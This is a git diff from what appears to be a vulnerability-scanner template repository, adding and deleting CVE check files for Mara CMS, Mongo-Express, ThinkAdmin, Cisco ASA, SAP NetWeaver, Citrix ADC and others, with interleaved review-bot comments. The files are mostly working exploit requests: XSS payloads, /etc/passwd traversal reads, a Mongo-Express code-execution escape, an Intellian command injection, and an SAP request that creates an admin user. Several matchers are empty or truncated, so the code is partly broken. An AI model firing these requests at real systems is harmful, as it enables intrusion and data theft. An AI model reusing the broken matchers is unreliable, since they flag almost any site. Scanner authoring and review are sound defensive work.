+# digest: 4a0a004730450221008097872f77e083ee9374b18077c62bf872f48da2df1712ced739421a606eaf1702203b58991ca90551263a55bf9c7a4edb0f9b2df893261d22aab66022ba6f78e500:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-24223.yaml b/poc/cve/cve-2020-24223.yaml
new file mode 100644
index 0000000000..481fb03e87
--- /dev/null
+++ b/poc/cve/cve-2020-24223.yaml
@@ -0,0 +1,49 @@
+id: CVE-2020-24223
+
+info:
+ name: Mara CMS 7.5 - Cross-Site Scripting
+ author: pikpikcu
+ severity: medium
+ description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
+ remediation: |
+ Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/48777
+ - https://sourceforge.net/projects/maracms/
+ - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-24223
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-24223
+ cwe-id: CWE-79
+ epss-score: 0.00976
+ epss-percentile: 0.81663
+ cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: mara_cms_project
+ product: mara_cms
+ tags: cve,cve2020,mara,xss,edb
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '">'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a00473045022043ab83b45965f275a386d5d9de52772fd7285114b4efa4a49f1576254d6d33e7022100f94f0330db512d8b17cff65578183ccf2157ac6bf6e1815cb83bc903a1a13ccd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-24391-4811.yaml b/poc/cve/cve-2020-24391-4811.yaml
deleted file mode 100644
index 3ad8a6889b..0000000000
--- a/poc/cve/cve-2020-24391-4811.yaml
+++ /dev/null
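Review bot: As shown in this hunk the body matcher is `- '">'`, a two-character string present in nearly every HTML page, so together with `text/html` and status `200` the template would flag any site that answers `contact.php`. The request injects a `<script>` element through `theme`, and the matcher should require that whole reflected string unencoded in the body, not only its first two characters. It is possible the rest of the word was stripped when this page was rendered, so the file itself should be checked before merge.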
@@ -1,53 +0,0 @@ -id: CVE-2020-24391 - -info: - name: Mongo-Express Remote Code Execution - author: leovalcante - severity: critical - description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. - reference: - - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a - - https://nvd.nist.gov/vuln/detail/CVE-2020-24391 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-24391 - tags: cve,cve2020,mongo,express,rce,intrusive - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - - | - POST /checkValid HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++ - - - | - GET /public/css/{{randstr}}.css HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: regex - part: body_3 - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - - - type: status - status: - - 200 - - extractors: - - type: regex - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - -# Enhanced by mp on 2022/03/27 diff --git a/poc/cve/cve-2020-25540.yaml b/poc/cve/cve-2020-25540.yaml deleted file mode 100644 index 3a385c2123..0000000000 --- a/poc/cve/cve-2020-25540.yaml +++ /dev/null 
@@ -1,44 +0,0 @@ -id: CVE-2020-25540 - -info: - name: ThinkAdmin 6 - Local File Inclusion - author: geeknik - severity: high - description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. - remediation: | - Apply the latest patch or upgrade to a version that is not affected by the vulnerability. - reference: - - https://www.exploit-db.com/exploits/48812 - - https://github.com/zoujingli/ThinkAdmin/issues/244 - - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/ - - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-25540 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-25540 - cwe-id: CWE-22 - epss-score: 0.96308 - epss-percentile: 0.99406 - cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ctolog - product: thinkadmin - tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 - -http: - - method: GET - path: - - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s' - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 -# digest: 4b0a00483046022100e4c1cfac913afdd71a9bf1a5b4b08af1badecb37eb715167ce184acf136c1d87022100c9bddf7ad90fce225a0c79221c051b790a7542df034a597eac6a373d60d01a8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-27467-4950.yaml b/poc/cve/cve-2020-27467-4950.yaml deleted file mode 100644 index 07630aa8de..0000000000 --- a/poc/cve/cve-2020-27467-4950.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2020-27467 -info: - name: Processwire CMS <2.7.1 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. - reference: - - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - - https://processwire.com/ - - https://github.com/ceng-yildirim/LFI-processwire - - https://nvd.nist.gov/vuln/detail/CVE-2020-27467 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-27467 - cwe-id: CWE-22 - tags: cve,cve2020,processwire,lfi,cms,oss -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?download=/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/cve/cve-2020-28976-4989.yaml b/poc/cve/cve-2020-28976-4989.yaml new file mode 100644 index 0000000000..d23e51db96 --- /dev/null +++ b/poc/cve/cve-2020-28976-4989.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2020-28976 + +info: + name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) + author: LogicalHunter + severity: medium + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. + reference: + - https://www.exploit-db.com/exploits/49189 + - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28976 + cwe-id: CWE-918 + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" \ No newline at end of file diff --git a/poc/cve/cve-2020-29227-5000.yaml b/poc/cve/cve-2020-29227-5000.yaml new file mode 100644 index 0000000000..8679600dfb --- /dev/null +++ b/poc/cve/cve-2020-29227-5000.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2020-29227 +info: + name: Car Rental Management System 1.0 - Local File Inclusion + author: daffainfo + severity: critical + description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution. + reference: + - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 + - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-29227 + tags: cve,cve2020,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=/etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/16 diff --git a/poc/cve/cve-2020-29395.yaml b/poc/cve/cve-2020-29395.yaml new file mode 100644 index 0000000000..dcaa2d6eb8 --- /dev/null +++ b/poc/cve/cve-2020-29395.yaml 
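Review bot: The body matcher `root:.*:0:0:` in this new template is looser than the `root:[x*]:0:0` form that CVE-2020-35749 uses in the same commit; the greedy `.*` lets it fire on any response line that contains `root:` and a later `:0:0:`. I would change the regex entry to `- "root:[x*]:0:0"`. The same loose pattern appears in the new CVE-2020-8641 and CVE-20200924a templates. The template is also rated critical for code execution, but the check only demonstrates a file read, so a hit should be triaged as file disclosure until confirmed further.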
@@ -0,0 +1,50 @@ +id: CVE-2020-29395 + +info: + name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting + author: daffainfo + severity: medium + description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field. + remediation: | + Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability. + reference: + - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS + - https://www.myeventon.com/news/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 + - http://packetstormsecurity.com/files/160282/WordPress-EventON-Calendar-3.0.5-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 + epss-score: 0.05489 + epss-percentile: 0.92391 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: myeventon + product: eventon + framework: wordpress + tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm + +http: + - method: GET + path: + - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a00473045022100acacef804c85b7da718c196fd8cfaa683d8571766960af825b7a7aa59d82c23a02204a51b89288bc610dfac50e7c2f07055ce5a2633e3a46ae2b52591b0f3687ed43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-3452(1).yaml b/poc/cve/cve-2020-3452(1).yaml new file mode 100644 index 0000000000..8866c4df36 --- /dev/null +++ b/poc/cve/cve-2020-3452(1).yaml 
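Review bot: The body word matcher in this template is an empty string (`words:` followed by `- ""`) as it appears here, and an empty word matches every response, so any host answering 200 with `text/html` on that path would be reported. If the file really holds the empty string, rather than this page having lost the markup, the word should be the decoded marker from the request path, `- "<svg/onload=alert(1)>"`. The new CVE-2020-36510 and CVE-2020-8194 templates later in this commit show the same empty body word and need the same check.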
@@ -0,0 +1,31 @@ +id: CVE-2020-3452 +info: + name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) - Arbitrary File Retrieval + author: pdteam + severity: high + description: | + A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. 
+ reference: + - https://twitter.com/aboul3la/status/1286012324722155525 + - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html + - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html + - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html + - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-3452 + cwe-id: CWE-20 + tags: cve,cve2020,cisco,lfi,kev +requests: + - method: GET + path: + - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" + - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" + matchers: + - type: word + words: + - "INTERNAL_PASSWORD_ENABLED" + - "CONF_VIRTUAL_KEYBOARD" + condition: and diff --git a/poc/cve/cve-2020-3452.yaml b/poc/cve/cve-2020-3452.yaml index 8866c4df36..0765bd4db4 100644 --- a/poc/cve/cve-2020-3452.yaml +++ b/poc/cve/cve-2020-3452.yaml 
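Review bot: This new file `cve-2020-3452(1).yaml` declares `id: CVE-2020-3452`, the same id as `poc/cve/cve-2020-3452.yaml`, and its blob `8866c4df36` is the pre-change blob of that file in the next section, so it is a stale copy of a template this commit updates. Two templates sharing one id produce duplicate findings, and the copy keeps the older `requests:` form and `cwe-id: CWE-20`. I would drop the `(1)` file. Other `(1)` files added in this commit, such as `cve-2020-36510(1).yaml` and `cve-2020-8654(1).yaml`, deserve the same comparison against their base names; whether those base files exist is not visible here.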
@@ -1,10 +1,13 @@ id: CVE-2020-3452 + info: - name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) - Arbitrary File Retrieval + name: Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion author: pdteam severity: high description: | - A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + remediation: | + Apply the necessary security patches or updates provided by Cisco to fix the vulnerability. reference: - https://twitter.com/aboul3la/status/1286012324722155525 - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html @@ -12,20 +15,31 @@ info: - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 + - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-3452 - cwe-id: CWE-20 - tags: cve,cve2020,cisco,lfi,kev -requests: + cwe-id: CWE-22,CWE-20 + epss-score: 0.97529 + epss-percentile: 0.99989 + cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: cisco + product: adaptive_security_appliance_software + tags: lfi,kev,packetstorm,cve,cve2020,cisco + +http: - method: GET path: - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" + matchers: - type: word words: - "INTERNAL_PASSWORD_ENABLED" - "CONF_VIRTUAL_KEYBOARD" condition: and +# digest: 490a0046304402200840d7f00d8ee6d97dd557be8ca1f4ad894d87c6636d5cce7156b6a391ce78ba022014ae2624ee4ba1f53d348c2de67a441f5dab0e11c92e1991556137c1520db236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-35749-5075.yaml b/poc/cve/cve-2020-35749-5075.yaml new file mode 100644 index 0000000000..e2aec51746 --- /dev/null 
+++ b/poc/cve/cve-2020-35749-5075.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-35749 + +info: + name: WordPress Simple Job Board <2.9.4 - Local File Inclusion + author: cckuailong + severity: high + description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + reference: + - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d + - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 + - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing + - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 + cve-id: CVE-2020-35749 + cwe-id: CWE-22 + tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/28 diff --git a/poc/cve/cve-2020-36510(1).yaml b/poc/cve/cve-2020-36510(1).yaml new file mode 100644 index 0000000000..adbb20d99d --- /dev/null +++ b/poc/cve/cve-2020-36510(1).yaml 
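Review bot: The second request hard-codes `post=372`, so the check can only succeed on a site where that post id exists (presumably as a resume post), and a miss is therefore not evidence that the plugin is patched. I would document this above the request with `# post id 372 is site-specific; a non-match does not rule out the issue`, or better, expose the id as a template variable. The description should also state that results depend on the supplied `{{username}}`/`{{password}}` account holding the `download_resume` capability.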
@@ -0,0 +1,35 @@ +id: CVE-2020-36510 +info: + name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting + author: veshraj + severity: medium + description: | + The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting. + reference: + - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-36510 + cwe-id: CWE-79 + metadata: + verified: false + tags: xss,wordpress,wp-theme,wp,cve,cve2020 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-6287.yaml b/poc/cve/cve-2020-6287.yaml deleted file mode 100644 index ff444b8861..0000000000 --- a/poc/cve/cve-2020-6287.yaml +++ /dev/null 
@@ -1,64 +0,0 @@ -id: CVE-2020-6287 - -info: - name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition - author: dwisiswant0 - severity: critical - description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system. - remediation: | - Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability. - reference: - - https://launchpad.support.sap.com/#/notes/2934135 - - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - - https://github.com/chipik/SAP_RECON - - https://nvd.nist.gov/vuln/detail/CVE-2020-6287 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2020-6287 - cwe-id: CWE-306 - epss-score: 0.97274 - epss-percentile: 0.99822 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sap - product: netweaver_application_server_java - shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2020,sap,kev - -http: - - raw: - - | - POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=UTF-8 - Connection: close - - sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc - 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 - userDetails - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CTCWebServiceSi" - - "SOAP-ENV" - condition: and - - - type: word - part: header - words: - - "text/xml" - - "SAP NetWeaver Application Server" - - - type: status - status: - 
- 200 - -# userName - sapRpoc6351 -# password - Secure!PwD8890 -# digest: 490a0046304402206fb2a5da16ff132b2a21082b70432b3286b90e734a24e273a09465280bf374ee0220631d9f5a1ff141020710b9edd119eab03396ce1c7e9a508552b24155d6650132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-7980(1).yaml b/poc/cve/cve-2020-7980(1).yaml deleted file mode 100644 index f9bc999b8e..0000000000 --- a/poc/cve/cve-2020-7980(1).yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-7980 -info: - name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution - author: ritikchaddha - severity: critical - description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 - - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html - - https://github.com/Xh4H/Satellian-CVE-2020-7980 - - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7980 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Intellian Aptus Web" - tags: satellian,rce,cve,cve2020,intellian,aptus -requests: - - raw: - - | - POST /cgi-bin/libagent.cgi?type=J HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Cookie: ctr_t=0; sid=123456789 - - {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1} - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/29 diff --git a/poc/cve/cve-2020-8194.yaml b/poc/cve/cve-2020-8194.yaml new file mode 100644 index 0000000000..bd7f67979e 
--- /dev/null +++ b/poc/cve/cve-2020-8194.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-8194 + +info: + name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection + author: dwisiswant0 + severity: medium + description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. + remediation: | + Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. + reference: + - https://support.citrix.com/article/CTX276688 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8194 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 + epss-score: 0.90775 + epss-percentile: 0.98542 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix + +http: + - raw: + - | + GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 + Host: {{Hostname}} + Cookie: startupapp=st + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "application/x-java-jnlp-file" + + - type: status + status: + - 200 +# digest: 4a0a004730450221008e18ba7d4c2e32d0f73d1647cf9f161bd007eed6513d0e57badd73330c4bbbfc02202246125e033d6ccaf0ef33eeae252e7c40449c4385db15dcf8af3fcd3c103cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-8497-5317.yaml b/poc/cve/cve-2020-8497-5317.yaml new file mode 100644 index 0000000000..cb79244f3d 
--- /dev/null +++ b/poc/cve/cve-2020-8497-5317.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-8497 +info: + name: Artica Pandora FMS - Arbitrary File Read + author: gy741 + severity: medium + description: In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. + reference: + - https://k4m1ll0.com/cve-2020-8497.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-8497 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-8497 + cwe-id: CWE-306 + tags: cve,cve2020,fms,artica +requests: + - method: GET + path: + - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"type"' + - '"id_user"' + - '"user_name"' + - '"text"' + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-8641-5330.yaml b/poc/cve/cve-2020-8641-5330.yaml new file mode 100644 index 0000000000..96f6de246c --- /dev/null +++ b/poc/cve/cve-2020-8641-5330.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-8641 + +info: + name: Lotus Core CMS 1.0.1 - Local File Inclusion + author: 0x_Akoko + severity: high + tags: cve,cve2020,lfi,lotus + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 + - 